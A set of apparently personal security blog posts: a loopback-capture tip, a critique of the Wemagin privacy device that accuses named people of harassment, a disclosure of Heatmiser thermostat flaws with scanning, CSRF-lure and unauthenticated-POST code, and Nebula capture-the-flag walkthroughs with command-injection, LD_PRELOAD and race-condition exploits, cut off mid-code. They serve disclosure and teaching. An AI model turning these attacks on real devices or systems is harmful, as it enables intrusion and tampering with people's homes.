Capturing and viewing loopback and external traffic in Windows

I am working on an issue at the moment that requires me not only to observe TCP/IP traffic leaving a box, but also going in-between processes on the same box.

Wireshark installs WinPcap on Windows, which unfortunately doesn’t allow you to capture traffic on the loopback interface.

Thankfully, there is a very useful piece of software available called RawCap. This is a tiny freeware application that uses raw sockets to capture loopback traffic on a Windows machine.

The problem with RawCap is that it only lets you capture a single interface at a time (and it also seems to have a number of issues collecting traffic for interfaces other than loopback unless you are running XP).

So use RawCap to capture loopback traffic. At the same time, start a capture in Wireshark as usual.

Stop the capture in Wireshark, and save it. Go to File->Merge… and select the file created by RawCap.

The two captures will now be interleaved, courtesy of the absolute timestamps used in pcap files.
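If you’re curious how little is involved in that interleaving, here is a minimal Python sketch of the merge-by-timestamp step. It assumes classic little-endian pcap files that share a link type – real tools handle far more cases, so treat this purely as an illustration:

```python
import struct

# Minimal classic pcap global header: magic, v2.4, UTC, snaplen 65535, Ethernet.
GLOBAL_HDR = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)

def read_packets(path):
    """Yield (timestamp, raw_record) pairs from a classic little-endian pcap."""
    with open(path, "rb") as f:
        f.read(24)  # skip the global header
        while True:
            hdr = f.read(16)  # per-packet: ts_sec, ts_usec, incl_len, orig_len
            if len(hdr) < 16:
                break
            ts_sec, ts_usec, incl_len, _ = struct.unpack("<IIII", hdr)
            yield ts_sec + ts_usec / 1e6, hdr + f.read(incl_len)

def merge(out_path, *in_paths):
    """Interleave packets from several captures by absolute timestamp."""
    records = sorted(r for path in in_paths for r in read_packets(path))
    with open(out_path, "wb") as f:
        f.write(GLOBAL_HDR)
        for _, rec in records:
            f.write(rec)
```

In practice, just use File->Merge… as above, or the mergecap command-line tool that ships with Wireshark.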

(Note: merging doesn’t seem to work well if the captures come from different machines, probably due to clock differences.)

Wemagin is Wemaginary

When Anonabox appeared on the crowd funding scene last month, a lot of information security professionals and privacy advocates were rightly annoyed by the dishonest claims made by the creators. Many of us spent quite a while raising questions and promoting concerns on various forms of media, until thankfully Kickstarter suspended the project. We don’t actually know what the final trigger was, but we do know that a concerted effort by a focused group can stop crowd funding projects in their tracks.

Since Anonabox, many more privacy projects have appeared. There are Tor routers that don’t make outlandish claims.  There is Anonabox on Indiegogo. There is also Wemagin.

Wemagin has a glossy website, professional videos, very bold claims, and some very vehement (but also, incredibly stupid) supporters.

Initial concerns

Wemagin make some bold, very assertive claims that set my alarm bells ringing:

  1. No trace is left on the computer that the device is used on
  2. No trace is left on the Internet when you use the device (including when accessing your banking website)
  3. It can run on any computer/it requires nothing from the computer to operate/can be used with public PC
  4. It can be used inside countries like North Korea safely

Why are these so worrying? Because there is no way that they are true.

1. No trace is left on the computer that the device is used on

This simply isn’t possible with modern operating systems.

The second you insert a USB device into a normal Windows machine, it leaves a plethora of traces. Some are very obvious (openly in the registry), others not so obvious, and some can only be recovered using advanced forensic techniques. This would at least prove you had used the Wemagin device.

Run an executable, start up a VM or create a new network interface and you leave even more traces behind. Wemagin is going to have to do one or more of these to work.

One supporter said “you can run things from the PC ram alone”. This really isn’t true any more for an application of any size. Even if it were, the second a laptop or desktop hibernates, it writes the RAM to disk. This can then be forensically analysed – leaving a trace. It is very difficult to prevent or remedy this.

Wemagin could say that they leave “little trace”, but they don’t – they say “no trace”.

2. No trace is left on the Internet when you use the device (including when accessing your banking website)

Wemagin seems to be a VPN and browser package. A VPN will make it appear as if you are using the Internet from another IP address.

If you visit a website, the website logs will still have a record of your visit, albeit with a different IP to the IP of the PC you are using. This is not “no trace”.

Log in to a website, and there will be a record of that login happening. This is not “no trace”.

Your ISP is also capable of logging your connection to Wemagin’s VPN servers. They wouldn’t be able to observe the traffic, but they would know you had established a VPN connection.

Tracking cookies and other techniques (such as browser fingerprinting) mean that you can be tracked across multiple sites. Log into one site and you can be tracked to others even if using a VPN.

Using a VPN leaves less trace (or, at least, a more convoluted one), but calling it “no trace” is not true.

3. It can run on any computer/it requires nothing from the computer to operate/can be used with public PC

Setting up a VPN and running a browser from a USB memory device isn’t a trivial action on a PC. You need access to a USB port; the system has to mount the USB device, allow executables to run from it, establish a network connection to a given IP and port, and possibly create a new network adapter. Often one or more of these will be disallowed on a public PC.

Our local library PCs run Symantec Endpoint, preventing USB sticks from being used without a password, and even then, no executables are allowed. There are other serious restrictions in what can be done – only a few select applications can be run. Web access is via a locked down proxy that cannot be reconfigured. This is fairly common on public PCs I have seen in airports, hotels, and schools.

It is also perfectly possible for firewalls and filters to detect VPN usage, even on non-standard ports. The traffic is encrypted, but it isn’t magically disguised. Many corporate environments will flag and alert on techniques used to evade filters.

Wemagin might have been doing something clever to get around these issues, but the creator has confirmed that they aren’t.

4. It can be used inside countries like North Korea safely

The Wemagin video shows emaciated North Korean children and talks of death penalties. They very strongly imply that using the Wemagin device in North Korea is safe.

Mainstream VPNs are not adequately safe for all purposes inside North Korea or China without following a lot of OPSEC rules and being very careful.

VPNs alone are not enough to protect your privacy if your adversary is a nation state – especially if you are claiming that it is so easy to use that your grandmother can use it.

Further issues

Those 4 issues were the ones that made me concerned. Looking deeper though, there are many, many more issues:

5. With a VPN you are reliant on trusting the VPN provider to stay anonymous

A VPN server – especially one that is a paid-for service – has to have at least some notion of who is using it and what they are doing. This in turn means you are reliant on the VPN provider keeping no logs and not co-operating with law enforcement or government.

This is a dangerous position to be in if you are relying on the anonymity and privacy of the VPN to keep you safe from harm.

Many European countries and the US have sweeping surveillance rules that can compel ISPs and telecoms providers to wiretap their customers without telling them.

Simple VPNs are fine for people in Western countries who want to bypass web filters or watch Netflix in another region. They are not fine for political activists in repressive regimes.

6. It’s even more complex with a VPN with end-points in multiple countries

There are already countless VPN providers, but they tend to operate their servers in single countries – normally countries that value privacy and have no/low data retention laws.

Wemagin however claims to have VPN end points in 12 countries.

This means that, to keep their users safe, Wemagin need to manage the legal situation in 12 countries.

Steve Kim, the creator, has implied he is not interested in doing this though:

We are dealing with technology capability, not legality disputes.

Again, fine if you just want to watch Netflix in the US from Amsterdam. Not if you are trying to overthrow the government in Iran.

7. The cloud storage is encrypted, but Wemagin also hold the keys

The creator has loosely confirmed that both the customer and Wemagin will hold the encryption keys for the data in the cloud:

Question: [you] will not meet our needs because using the Dropbox model means Wemagin will have access to users’ stored files, and may be able to turn them over to 3rd parties. Will you be offering VPN service without the bundled cloud storage?
Answer: Our cloud is given for free with our VPN. Wemagin has the ability to view. We are not concerned about what you have. At this stage, we need to trust each other.

Wemagin can give the keys to anyone. The keys could be leaked, or obtained by a hacker.

Again, this means that you have to rely solely on trust to protect your data.

Note: This is likely because it is re-labelled cloud storage from another provider.

8. Loads of wishy-washy words and no technical detail

“Military grade”, “Fast Download Speed” and so on.

There is a total lack of any technical detail on how the system works. For a system that is meant to be shipping in 3 months, this is worrying.

It reminds me of when you ask a kid to invent something: “I invented a spaceship to go to Mars and then we can live on a space base”. The idea is there, but none of the technical know-how.

9. Worldwide patent pending

Another common snake-oil salesman tactic.

There is no worldwide patent system to start with. “Patent pending” simply means you have applied for a patent and it has yet to be granted.

But often patents on snake-oil products are on things like cosmetic appearance or other trivialities e.g. the colour and shape of the USB stick, or something totally unrelated to the key selling points like the way a menu can appear or the exact steps needed to login.

This would appear to be the case for Wemagin – the US20130024931 A1 patent largely concerns the UI and usability of a USB stick. It doesn’t even mention VPNs. There’s a brief mention of leaving no trace on the host machine:

The operating system operates on the host computer without the host computer being able to detect and store information related to the operation of the flash memory device.

But no description of how this could be achieved.

Rather amusingly, there is an image in the patent like so:

Imagination is more important than knowledge!

That says quite a lot.

10. Strange wagers to people wanting to test the product

Rather than just… you know… send the product to be tested, you need to go to China and stump up $10k of your own cash.

This seems a fairly common tactic with snake-oil salesmen.

11. Incoherent responses from the creators that fail to address any concerns

Just read the most recent update to backers.

So little of this makes any sense. There is a strong theme of paranoia and also deflection from any of the serious questions.

Steve’s comments aren’t any better. The one where he searches for Rajan’s details, gets them wrong, and then goes on a paranoid rant about competitors is particularly good.

12. An implausibly large team

Really? This many people have worked on a project that has virtually no technical detail? Why are eight law firms involved?

13. The cloud storage appears to be re-labelled

A quick google site search of gets us to a login page for WCLOUD – presumably the cloud storage.


First thing of note – this is not HTTPS. This means that your credentials can be sniffed. There’s not really any excuse for this.

But then, let’s look at the source of the page:

Whilst the form is on the Wemagin site, it is submitting the credentials (in the plain, again) to – an unlimited cloud storage provider.

You pay £39.99 a month to be an unlimited reseller of

Are they not even planning on keeping this in-house? has no particular privacy or anonymity focus.

Reselling or using another provider is fine. But you need to be honest about this, especially when you make such bold claims about your product.

14. The VPN appears to be re-labelled IPVanish

The main Wemagin video shows the UI and list of servers used by the VPN.

The UI is virtually identical to the UI of IPVanish. The servers have the same names. IPVanish also have a programme to re-label their product.

Again, re-labelling is fine, but IPVanish is not the VPN solution you need if you are dealing with nation state adversaries.

15. There is an open admin interface on the Wemagin servers

A google site search of leads to an admin page which has no authentication at all and no encryption.


This page leaks customer details including email addresses and key serial numbers.

16. The WCLOUD webpages have Google analytics tracking

As someone on 4chan pointed out, the WCLOUD webpages have Google analytics code in them.


This is actively harming your privacy and anonymity.

17. The logins used in the promotional video actually worked

The promotional video showed logins using the onscreen keyboard.

These logins actually worked.


Just more evidence pointing to a total lack of awareness of security.

18. Running anything on an untrusted machine is incredibly dangerous

It’s suggested Wemagin can be used on any machine safely. It’s very, very hard to run anything on an untrusted machine safely.

The host OS can see everything, even if the guest OS is running inside a VM.

On-screen keyboards are not adequate protection against a hostile machine.

There are frequently vulnerabilities that allow data to flow between guest and host OS.

19. A team member has admitted to attempting to smear critics

Team member Paul Lee of Cannysage Studios admitted to making a post on a totally unrelated forum calling me a racist.

Steve Kim has said that you need to trust them. How can you trust a company that acts like this?

20. Clear astroturfing

Paul Lee, a team member, was posting as Paul.

Ruth Read, who says she invested in Wemagin 3.5 years ago, is also posting comments saying she can’t wait to receive the product.

21. The USB stick is off the shelf

“Four separate molds have been made.”

“There are 4 manufacturers on standby.”

But it’s just an off-the-shelf USB stick from China.

22. Silently altering important details of the project

Before. After.

Notice how some of the claims have gone:
“No digital footprint left on the USB device to track”
“No cache, cookies or history on the computer”
“Masked IP address”

Before. After.

Notice how “no trace” has gone, and “beta” has turned up.

Also, they seem to have got rid of “The Team” on the main Wemagin page. Right after the team member Paul Lee admitted to smearing me.

23. Already tried and failed with WCLOUD

It looks like WCLOUD has been around for a while. Previously, it wasn’t motivated by privacy, secrecy, North Korea or anything like that. It was a lot cheaper.

24. Paying people to promote Wemagin

There are numerous Craigslist job adverts asking for people to promote Wemagin. How many of the people supporting the project are paid?


Would you trust a privacy product that has this many inconsistencies, exaggerations, and problems?

I know I wouldn’t.

Most of these issues could be cleared up by an improved technical specification along with some changes to the claims.


We have questions for Steve:

  1. Is this designed to be used inside North Korea, China, Iran, and Syria safely?
  2. Is Wemagin “low trace” (leaves no trace visible to some with average skills) or “no trace” (leaves no trace even after detailed forensic examination)?
  3. Is Wemagin re-labelling cloud and VPN services from other providers?
  4. Your beta testers and security testing have missed some very obvious problems. How are these going to be addressed?


Why am I doing this? Shouldn’t a small start-up have every chance to deliver this project?


I am absolutely fine with companies producing tools to help middle-aged white men in Western countries access porn without their spouses knowing.

I am absolutely fine with companies producing tools to help school-kids bypass restrictive firewalls preventing them accessing the Anarchists Cookbook.

I am not absolutely fine with companies producing tools where they claim to be able to protect people in repressive regimes when everything indicates this is going to put them at great risk.

I am not absolutely fine with companies using emotive images like emaciated children in North Korea to make a quick buck.

Wemagin started as a project with outlandish claims but the behaviour of the creator has put it into the territory of outright dishonesty.

I am not a competitor to Wemagin.

I am not being paid to criticise Wemagin.

Nothing I have said here is untrue or unfair. There is a worrying tendency at the moment for people to call any robust, reasonable criticism “bullying”. It isn’t bullying – it’s other people telling you that what you are saying is not adding up. You are free to respond to concerns, free to contact me, free to point out if anything I have said is untrue.

Yet, supporters of Wemagin think it is:

Really, who are the bullies here?

The bullies are Wemagin. All of the image links here are on Imgur to avoid any accusations of tampering.

On Sunday, I saw hits coming from a car forum called NASIOC: (no link, as private).

I visited the site to find a user, Wardroid, posted a thread entitled “Racist Cyber bully” claiming I had said “jap tech is overrated”:

The thread has since been deleted – because it was against the rules of the forum – but here is the google cache:

I have no way of proving that I didn’t do something, but most people who know me would say it would be extremely out of character to post something like that. It’s also really the job of the accuser to prove something like that.

The user who started the thread, “Wardroid”, has posted several videos to YouTube as user “canny3d”:

You’ll note that this video is by “Cannysage Studios”.

You may recognise this name from where he is listed as a video consultant:

When asked about this on twitter, Paul Lee said:
“I got an anonymous email that you were a racist and don’t like asians.”

So a team member of Wemagin got an anonymous email that I am racist, found absolutely zero evidence of this, went onto a car forum and posted a thread to incite abuse.

Of course, we need to link this to Paul from Kickstarter.

This post on the forum uses a link to my page “Bad companies”, something the user Paul has taken issue with before:

It also uses very similar language to Paul’s post:

He’s self-claimed ‘hacker’ and security researcher, lol. viral material in development.

also claiming that you are a ‘hardware hacker,’ LOL.

The forum post was made on the forum very shortly after Paul was banned from commenting on Kickstarter after threatening to disclose my personal address and mentioning that he had gone through my photos (which were then mentioned in the forum post):

I have further evidence that Paul Lee of Cannysage Studios is harassing me but it steps across the line of “doxxing” to post it. So I won’t.

Heatmiser WiFi thermostat vulnerabilities

Update – if your heating is misbehaving, you need to disable port forwarding to ports 80 and 8068. This should simply be the reverse of whatever you did to set port forwarding up. Alternatively, you could disable WiFi entirely by entering an invalid SSID and password – I believe the thermostats should continue to work.

Contact for an official response.


A while back, I came across a page listing some vulnerabilities on Heatmiser’s Netmonitor product. The Netmonitor is old and discontinued though, so maybe some lessons have been learnt.

I thought I’d take a quick look at the rest of their product line. They have a series of products, generally called WiFi thermostats that connect directly to your router using 802.11b. The products aren’t listed on their site (possibly removed after reporting this), but this Amazon listing gives you an idea.

This is a WiFi thermostat running version v1.2 of the firmware. There are newer versions of the firmware – up to v1.7 as far as I can see.

A quick look at the manuals shows that Heatmiser recommend two ports are forwarded to the thermostat from the router: port 80 for web control and port 8068 for app control.

Port forwarding

Port forwarding to a small embedded device is an easy way to get access to the device remotely, but it also puts you at risk. That device is now entirely open to the wider Internet on ports 80 and 8068.

Also of note – a quick google search for port 8068 shows that the Heatmiser is the most common reason to have port 8068 open. This makes finding Heatmiser thermostats much easier. Scanning for them on port 80 is slow: port 80 could be serving any web page, so you need to check for port 80 being open, connect, perform an HTTP request, and then check the content of the page (e.g. does the title contain “Heatmiser”?).

Scanning for Heatmiser thermostats on port 8068 just requires a quick check for the port being open – we can be fairly confident that anything with this port open is one of their devices. We can then make a detailed check on port 80.

nmap can easily do this scan. If you want to scan large blocks of addresses though, masscan is much faster.
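As a sketch, the two-stage check is simple enough to do by hand in Python – a cheap TCP probe on 8068 first, then the slower HTTP title check on 80. The ports are parameters here so it can be pointed anywhere; the title string is the one the devices report:

```python
import socket

def looks_like_heatmiser(host, app_port=8068, web_port=80, timeout=2.0):
    """Two-stage probe: quick port check first, then a page-title check."""
    # Cheap check: is the app port open at all?
    try:
        socket.create_connection((host, app_port), timeout=timeout).close()
    except OSError:
        return False
    # Only then do the expensive check: fetch the page and inspect the title.
    try:
        with socket.create_connection((host, web_port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\n\r\n")
            page = b""
            while chunk := s.recv(4096):
                page += chunk
    except OSError:
        return False
    return b"Heatmiser Wifi Thermostat" in page
```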

However, other people have already done the hard work for us – the Shodan search engine scans all IPs, connects to port 80 and records the results. We just need a search term. This is simple – the title of the page is always “Heatmiser Wifi Thermostat”.

Plugging this into Shodan, we get over 7,000 results. That’s quite a lot. (Note: you might need to register to use filters like this.)

Shodan results

Issue 1 – default web credentials and PIN

To configure the thermostat, you connect with USB and use a Windows utility. In here you can set the username/password for the web interface and the PIN for port 8068 app access.

Heatmiser app

The application defaults to admin/admin and PIN 1234.

Even the manual suggests the default username and password.

Defaults in manual

It’s essential that an internet connected device enforces a custom password of decent strength. This isn’t even suggested or prompted for, never mind enforced.

Heatmiser’s response is that the password should be changed. My response is that their software shouldn’t allow defaults.

Issue 2 – WiFi credentials and passwords can be seen in the plain

When logged into one of the devices, the username, password, WiFi SSID and WiFi password are all filled into the form and can be viewed easily by examining the source of the webpage.

There is really no excuse for this – it’s lazy.

Issue 3 – in-browser user input validation/sanitising

Viewing the source of several pages, it can be seen that the user input is validated and sanitised by Javascript.

JS input checks

Why is this an issue? Because often this means no checks are done by the device itself after input is submitted. All you need to do to pass invalid or dangerous data is not use a web-browser to send requests. Use a custom client that performs the same action without the validation.

This opens up many potential attacks.

This seems quite common with low-end processors connected to the Internet. The browser has a lot more power and is a lot more responsive, so checks in-browser often seem attractive.

Issue 4 – open to CSRF attacks

Once logged into the device with a given client (e.g. Chrome), other clients on the same machine can access the device as if they were logged in.

This enables an attack technique called cross-site request forgery. It means that I can send a user a link containing a malicious request and the device will blindly carry it out. For example, I could send a request to change the password to one of my choosing in an email, and as long as the user has logged into the thermostat recently, that request will be carried out by the device.
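A sketch of what such a lure could look like, built as a string for illustration. The path (index.htm) and field name (password) are hypothetical placeholders, not the device’s real ones:

```python
def csrf_lure(device_ip: str) -> str:
    """Build a self-submitting HTML form that fires a forged request at the
    thermostat. 'index.htm' and 'password' are hypothetical placeholders."""
    return (
        f'<form action="http://{device_ip}/index.htm" method="POST">\n'
        '  <input type="hidden" name="password" value="attacker-chosen">\n'
        "</form>\n"
        "<script>document.forms[0].submit()</script>"
    )
```

If the victim has logged in recently, their browser happily submits this and the device carries it out.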

Best practice would dictate that only requests from pages generated by the device itself would work.

There are a number of ways to protect against CSRF – it’s actually quite complex to do, but this device has no protection at all.

It gets worse though. It appears the authentication works only by IP address. Once the thermostat sees you have logged in from a given IP address, any requests from that IP address will work.

This is a really bad thing to do.

Most homes and workplaces use something called NAT on their routers. This means that all of your laptops, PCs, phones, consoles and tablets all appear to have the same IP to anyone looking from the outside. If I log in to my thermostat from work, it’s likely that the IP address the thermostat sees is also in use by a number of other people.

This means that if I log in to my thermostat at work, anyone else in my workplace can access my thermostat simply by visiting the page without any need for credentials.

As I said, protecting against CSRF is hard but this is as vulnerable as it gets to CSRF.

Issue 5 – no rate limiting or lockout on the port 8068 PIN

The Android and iPhone apps access the device on port 8068 using a custom protocol. Part of this involves sending the 4-digit PIN to authenticate the app.

A 4-digit PIN has only 10,000 combinations and no username component. This makes brute-forcing the PIN very easy, so it is vital that there is rate limiting or a lockout, e.g. a maximum of 3 failed PIN attempts followed by a 10-minute lockout.

There is no rate limiting on the WiFi thermostats. You can try about 2 PINs/second over the Internet, i.e. going through all 10,000 PINs takes about 1.5 hours.

Now and then, requests time out when attempting PINs rapidly, but I suspect this is just a limitation of a low-power embedded device.

Even a fairly conservative lockout of 10 minutes after 3 wrong attempts would increase this to 23 days.
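The arithmetic behind those two figures, for anyone who wants to check it:

```python
PINS = 10_000          # 4-digit PIN keyspace
RATE = 2               # attempts per second, as measured above

# No lockout: just walk the whole keyspace.
no_lockout_hours = PINS / RATE / 3600
print(f"{no_lockout_hours:.1f} hours")        # ≈ 1.4 hours

# With 3 attempts allowed per 10-minute window, the worst case becomes:
lockout_days = PINS / 3 * 600 / 86400
print(f"{lockout_days:.1f} days")             # ≈ 23.1 days
```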

I have written a proof-of-concept to brute force the PIN but don’t want to release it openly currently.

Issue 6 – no means of updating firmware without a physical programmer and taking the device apart

Fixing issues in embedded, Internet connected devices requires a firmware update.

The WiFi thermostat appears to have no way of doing this remotely or via the web interface. It requires borrowing a programmer from Heatmiser (after paying a deposit), removing the device from the wall and updating it.

This is such a large barrier that very few people are going to do it. This creates a dynamic where neither the company nor the customer is driven to fix security issues or deploy updates. The source for this little nugget of info was this page here – where someone describes the process in the comments.


Issue 7 – trivial web authentication bypass

Go to the IP of any Heatmiser thermostat in a browser and you get the login box (often along with an annoying Javascript pop-up telling you the username/password is wrong for no reason).


Give it the right password and you end up on a framed window with several bits of HTML.

Main page

Each one of these frames is a .htm file. Trying each of them one by one, it turns out that left.htm can always be accessed regardless of login status. This is the left-hand menu.


From here all of the menu items work fine (even if the individual .htm files didn’t work directly).

You can go to the “Password” page, view the source, and then recover the password and login normally.

This means that gaining remote access to these thermostats is as easy as going to:

This is really not good.

Edit – the reason this happens is that the Javascript redirect (issue 8 below) has an error in it on left.htm…

Issue 8 – part of the authentication is Javascript based (up to v1.7)

Most of the thermostat pages have this little Javascript snippet on them:

This checks to see if you are logged in. If you aren’t, you get redirected back to the login page.

This would be a great idea if the same piece of HTML didn’t also include the content that you aren’t supposed to see.

You are letting the bad guys in regardless, and hoping you kick them out quickly enough not to see anything.

All you need to do to view the protected pages – including the one with the password in the open – is view the page in a browser with Javascript turned off, or use wget.
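Because a plain HTTP client never executes the Javascript, the redirect simply doesn’t fire and the full page comes back. The Python equivalent of the wget approach – the host and page name here are placeholders:

```python
from urllib.request import urlopen

def fetch_protected(host: str, page: str = "left.htm") -> bytes:
    """Fetch a 'protected' page without executing its Javascript redirect."""
    return urlopen(f"http://{host}/{page}", timeout=5).read()
```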

This is amongst the most awful security design I have ever seen.

Issue 9 – commands are carried out by unauthenticated HTTP POST

Most people who use a web browser will be familiar with HTTP GET being used to send data to the server at the other end. Google queries are the most obvious example – the search terms are visible right in the URL.

There is another mechanism called POST. You don’t see these in the URL like GET, but the idea is very similar.

All you need to do to change settings on the thermostat is send a POST request. No password required.

The barrier to entry here is that you can’t just type POST requests into the URL bar. But it isn’t exactly hard.

That’s just a grab from Burp Suite sending a request to a thermostat to change the time.

But you can seemingly change any setting.
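A sketch of what building such a request looks like by hand. The path and field name are hypothetical placeholders – the real ones would come from a proxy capture like the Burp grab – but the point is what’s missing: no cookie, no password, nothing:

```python
from urllib.parse import urlencode
from urllib.request import Request, urlopen

def build_settings_request(host: str, fields: dict) -> Request:
    """Build an unauthenticated POST. '/index.htm' is a placeholder path."""
    body = urlencode(fields).encode()
    return Request(f"http://{host}/index.htm", data=body)  # data => POST

# Sending it would just be: urlopen(build_settings_request(ip, {...}))
```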


I’ve stopped looking for issues at this point. There are probably a wealth of other things that could be worth investigating, including:

  • Fuzzing the port 8068 input. Custom protocols are often vulnerable to malformed inputs causing crashes
  • Hidden webpages
  • Backdoor accounts
  • Firmware inspection

But, at this point, it looks like security is the last thing on the list of priorities for Heatmiser.

If you want a thermostat that can’t be activated by just about anyone, then I would suggest returning your Heatmiser WiFi thermostat.

My recommendation would be to stop port-forwarding to both ports 80 and 8068. You will lose remote control, but will still be able to access the thermostat from inside your house.

You can contact Heatmiser on if you need help dealing with this.

Heatmiser’s response

I emailed Heatmiser to inform them of these issues.

I believe they must have been aware of some or all of these issues before now, and due to the severity and basic nature of the issues, I decided to follow full disclosure.

They have responded as follows:

Thank you for your email.
We are investigating the issues you mention and will provide an update to fix the security issues you highlight. We will advise customers in the meantime to close port 80 on their WiFi Thermostat until the issue has been rectified.
Once again, thank you for bringing this to our attention.

Heatmiser’s solution

Heatmiser have sent an email/letter out to customers. They have two options – replace the thermostat with one without a web interface and with rate limiting on the PIN, or get a refund.

I’m surprised there is no attempt to fix the web interface.

Here is the Letter from Heatmiser sent out.

How many microcontrollers does a quadcopter have on it?

I was sat on the floor last night, wiring up new bits and pieces to my quadcopter, and it dawned on me that there are an awful lot of microcontrollers on it.

  1. Each electronic speed control (ESC) has an ATmega328 onboard (4, total 4)
  2. The flight controller has an STM microcontroller, CP2102 serial->USB bridge, MPU-6050 3-axis gyro/accelerometer, HMC5883L compass, MS5611 barometer (5, total 9)
  3. The FrSky X8R receiver has at least one microcontroller in it (1, total 10)
  4. The SBUS to CPPM converter has at least one microcontroller in it (1, total 11)
  5. The FrSky Variometer has at least one microcontroller in it (1, total 12)
  6. The FrSky FLVSS voltage monitor has at least one microcontroller (1, total 13).
  7. The SimpleBGC gimbal controller has 2 microcontrollers (1 main, 1 for yaw), a serial to USB bridge, another accelerometer and gyro (4, total 17)
  8. The GoPro will have at least 3 microcontrollers inside it (2 for camera, 1 in SD card) (3, total 20)

That is a lot to potentially go wrong.


Nebula exploit exercises walkthrough – level12

There is a backdoor process listening on port 50001.

My experience with Lua is minimal at best, but it’s pretty obvious that the hash() function calls a shell command, and allows for command injection.
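A quick sketch of exploiting it, assuming the usual level12 setup where the password you submit is spliced straight into a shell command. The prompt handling is a guess; the payload is the important bit – a ‘;’ terminates the intended command and runs ours:

```python
import socket

def build_payload() -> bytes:
    # Everything before the ';' gets hashed as normal; the injected command
    # runs with the privileges of the backdoor process.
    return b"x; getflag > /tmp/flag12.out; echo x\n"

def exploit(host: str = "127.0.0.1", port: int = 50001) -> bytes:
    with socket.create_connection((host, port)) as s:
        s.recv(1024)             # password prompt (assumed)
        s.sendall(build_payload())
        return s.recv(1024)
```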

To run getflag is very simple:

And if you want to pass the check for the hash for fun, it is also simple:

Nebula exploit exercises walkthrough – level11

The /home/flag11/flag11 binary processes standard input and executes a shell command.

There are two ways of completing this level, you may wish to do both :-)

Now it gets interesting. This is the first bit of code where it isn’t obvious what the intent is from a quick glance.

I think I have found three ways to get this to execute getflag, though one is just a variation of another.

The code reads from stdin, then checks for “Content-Length: “, reads a length integer, and then processes this.

There are a number of paths from this point. If the length is less than the buf length (1024), then fread is called. Then there is a bug.

This is what happens on this code path:

But later on:

From the man page of fread:

size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream);

The function fread() reads nmemb elements of data, each size bytes long, from the stream pointed to by stream, storing them at the location given by ptr.

fread() and fwrite() return the number of items successfully read or written (i.e., not the number of characters).

Whilst both read in the same data, the return values will be different. The first will return 1, the second will return the number of characters read.

This means the only way to reach process() with a length less than 1024 is to set the length to 1. This restricts our options a fair bit.

We’ll try it out though:

As expected, the value we pass (E, an arbitrary choice) gets “processed” to become D. system is then called, but because we can only provide a single character, we can’t null-terminate the command, and we get some random values after it.

We can see these values vary each time we run it:

One thing that does happen though is that, by chance, we end up with a null being in the right place:

This is pure luck. The rest of the buffer is uninitialised, and nulls are common in uninitialised memory.

If we now symbolically link D to /bin/getflag, and alter the PATH so it runs D when the null is in the right place:

Hmmph. Why is it not the flag account? I think this is a bug – the call to system isn’t preceded by setresuid/setresgid, so anything it runs will run as the real UID (level11) instead of the effective UID (flag11).

Coincidentally, I had recently read of a technique to fill uninitialised memory. It’s virtually useless in the real world – using uninitialised memory is indicative of much bigger issues. It’s interesting though, so let’s try it here.

This technique uses an environment variable called LD_PRELOAD. This is commonly used to override library functions for debugging (or exploits!). When the linker starts up, it reads the entirety of LD_PRELOAD onto the stack and then doesn’t clean up afterwards. This means we can initialise the memory to something under our control:

i.e. fill the stack with one thousand /bin/getflags.

Then when we run flag11 with length of 1, it will almost certainly have this in the buffer already:

Again the same issue with suid/system, but I think it counts.

Now we need to come back to the length being 1024 or more. What happens here?

There is a really simple encryption function:

We can easily build the reverse of this in Python and output a string:

(note: I originally terminated the command with a newline (x0a), which was causing this to fail)
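The script isn’t reproduced here, but a sketch of the idea looks like this – assuming process() XORs each byte with a running key that starts at `length & 0xff` and has each decoded byte subtracted from it (check this against the actual flag11 source):

```python
def encode(cmd, total_len=1024):
    # NUL-terminate the command so system() stops there, then pad
    # the rest of the block with NULs
    plain = cmd.encode() + b"\x00" * (total_len - len(cmd))
    key = total_len & 0xff
    out = bytearray()
    for p in plain:
        out.append(p ^ (key & 0xff))  # cipher byte that decodes back to p
        key = (key - p) & 0xffffffff  # mirror the decoder's key update
    return bytes(out)

# simulation of what the binary's process() does to our input
def decode(data):
    key = len(data) & 0xff
    out = bytearray()
    for c in data:
        d = c ^ (key & 0xff)
        out.append(d)
        key = (key - d) & 0xffffffff
    return bytes(out)

payload = encode("getflag")
assert decode(payload).rstrip(b"\x00") == b"getflag"
```

You would then write a `Content-Length: 1024` header followed by the payload to the binary’s stdin. As a sanity check against the length-1 run above, `decode(b"E")` gives `b"D"` under this assumed cipher.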

We can then pipe this into the executable, to run the command:



Whilst playing around with this level, I thought there might be something I could do with the random path/filename that is used when the content length is 1024 or greater.

The filename is normally of the form:

As seen from strace. This is the PID (process ID) followed by a “random” string.

We can gain control of this string, the filename, and stop it from being deleted. This uses LD_PRELOAD, but for its genuine use.

First, we must check that the executable is dynamically linked:


Now we need to create a C file to override the functions we want – random(), unlink() and getpid():

Then we compile it into a library, set LD_PRELOAD, and then run the executable:

And now we have control of the filename, and it is preserved rather than deleted.

Not of any real use, but a handy technique.

Nebula exploit exercises walkthrough – level10

The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.

I think I can already see the problem.

Firstly, we can see that the token file we need to read out is permissioned such that level10 cannot see it:

On line x above, we have the following:

From the man page of access:

access() checks whether the calling process can access the file pathname.

The check is done using the calling process’s real UID and GID, rather than the effective IDs as is done when actually attempting an operation (e.g., open(2)) on the file.

So we check the file permissions using the real UID (level10), but then later on we do:

and open uses the effective UID, and as the executable has suid, this means flag10.

This is commonly called a time-of-check to time-of-use, or TOCTOU, bug (Wikipedia’s example is pretty much exactly the same issue).

If we can swap out the file between the time-of-check and the time-of-use, we should be able to send token.

First, let’s just check the program works as expected.

Setup a listening netcat on my host using:

And then run it on nebula with a file we have access to:

And we receive it at the other end, plus a little banner:

Ok – so how do we exploit the race condition? The best way to swap the file about is to use symbolic links again. How do we time that though? I’m fundamentally a lazy person, so let’s just try swapping out the files as quickly as we can and hope it works.

First, let’s setup a loop that flips a symbolic link from the real token to a fake one repeatedly:

The f switch on ln makes sure we overwrite the existing symbolic link. The & at the end puts the job into the background.
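The flipping idea can be sketched in Python with stand-in files (on Nebula it was a bash one-liner against the real token; the filenames here are hypothetical):

```python
import os
import tempfile

# stand-ins for the real files on the Nebula box
work = tempfile.mkdtemp()
os.chdir(work)
open("decoy", "w").write("decoy\n")    # file level10 may read
open("token", "w").write("secret\n")   # file only flag10 may read

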